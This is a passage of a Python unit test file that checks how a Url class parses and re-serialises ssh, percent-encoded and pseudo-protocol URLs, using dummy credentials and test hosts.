('ssh://user:password@testhost?myvar=testvalue',
'ssh://user:password@testhost:22?myvar=testvalue'),
('ssh://user:password@testhost',
'ssh://user:password@testhost:22'),
('ssh://user:password:<PASSWORD>@testhost',
'ssh://user:password:password2@testhost:22'),
# Multiple arguments.
('ssh://user:password@testhost?myvar=testvalue&myvar2=test%202',
'ssh://user:password@testhost:22?myvar=testvalue&myvar2=test+2'),
('ssh://user:password@testhost?myvar=testvalue&myvar2=test%202',
'ssh://user:password@testhost:22?myvar=testvalue&myvar2=test+2'),
# Encoding.
('foo://%27M%7B7Zk:%27%2FM%7B7Zyk:C7%26Rt%3Ea@ULM-SZRC1:23',
'foo://%27M%7B7Zk:%27%2FM%7B7Zyk:C7%26Rt%3Ea@ULM-SZRC1:23'),
# Pseudo protocol.
('pseudo://../my/path',
'pseudo://../my/path'),
('pseudo://../path',
'pseudo://../path'),
('pseudo://filename',
'pseudo://filename'),
('pseudo:///abspath',
'pseudo:///abspath'),
('pseudo:///abs/path',
'pseudo:///abs/path'),
]
class urlTest(unittest.TestCase):
CORRELATE = Url
def testConstructor(self):
self.assertIsInstance(Url(), Url)
def testToString(self):
for url, expected in urls:
result = Url.from_string(url)
error = 'URL: ' + url + '\n'
error += 'Result: ' + str(result) + '\n'
error += 'Expected: ' + expected
self.assertIsInstance(result, Url, error)
self.assertEqual(result.to_string(), expected, error)
def testFromString(self):
for url, expected in urls:
result = Url.from_string(url)
error = 'URL: ' + url + '\n'
error += 'Result: ' + str(result) + '\n'
error += 'Expected: ' + expected
self.assertIsInstance(result, Url)
self.assertTrue(str(result) == expected, error)
def suite():
return unittest.TestLoader().loadTestsFromTestCase(urlTest)
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite())
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.